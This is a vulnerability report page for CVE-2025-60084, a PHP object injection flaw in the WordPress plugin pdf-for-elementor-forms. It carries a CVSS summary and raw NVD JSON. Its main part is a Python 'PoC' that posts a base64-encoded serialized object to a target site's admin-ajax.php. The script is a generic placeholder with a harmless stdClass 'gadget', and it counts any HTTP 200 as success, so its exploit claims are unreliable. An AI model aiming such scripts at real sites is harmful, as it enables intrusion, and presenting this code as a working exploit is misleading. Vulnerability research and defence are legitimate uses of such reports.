Security Vulnerability Report
中文
CVE-2025-60084 CVSS 8.8 HIGH

CVE-2025-60084

Published: 2025-12-18 08:16:09
Last Modified: 2026-04-27 16:16:32

Description

Deserialization of Untrusted Data vulnerability in add-ons.org PDF for Elementor Forms + Drag And Drop Template Builder pdf-for-elementor-forms allows Object Injection.This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through <= 6.5.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

pdf-for-elementor-forms <= 6.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60084 PHP Object Injection PoC # Target: WordPress with pdf-for-elementor-forms plugin <= 6.5.0 import requests import base64 import sys def generate_malicious_payload(): """ Generate a PHP object injection payload This is a template - actual exploitation requires finding suitable gadget chain """ # Example gadget chain class (actual chain depends on installed plugins/themes) gadget_class = 'O:8:"stdClass":2:{s:4:"test";s:5:"value";s:5:"shell";s:10:"phpinfo();";}' return gadget_class def exploit_cve_2025_60084(target_url, form_id=1): """ Exploit CVE-2025-60084 - Object Injection in pdf-for-elementor-forms Args: target_url: Base URL of the WordPress site form_id: Elementor form ID to target Returns: bool: True if exploitation appears successful """ # Generate malicious serialized payload payload = generate_malicious_payload() encoded_payload = base64.b64encode(payload.encode()).decode() # Target endpoint - typically Elementor form submission endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct the malicious request data = { 'action': 'elementor_pro_forms_send_form', 'form_id': form_id, 'pdf_data': encoded_payload, # Injected payload 'fields': { 'pdf_template': encoded_payload } } try: response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f"[*] Request sent to {endpoint}") print(f"[*] Payload length: {len(payload)} bytes") print(f"[*] Response status: {response.status_code}") return True else: print(f"[!] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-60084.py <target_url>") print("Example: python cve-2025-60084.py http://victim.com") sys.exit(1) target = sys.argv[1] print(f"[*] Targeting: {target}") print(f"[*] Exploiting CVE-2025-60084") exploit_cve_2025_60084(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60084", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:08.700", "lastModified": "2026-04-27T16:16:32.037", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in add-ons.org PDF for Elementor Forms + Drag And Drop Template Builder pdf-for-elementor-forms allows Object Injection.This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through <= 6.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/pdf-for-elementor-forms/vulnerability/wordpress-pdf-for-elementor-forms-drag-and-drop-template-builder-plugin-6-3-1-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}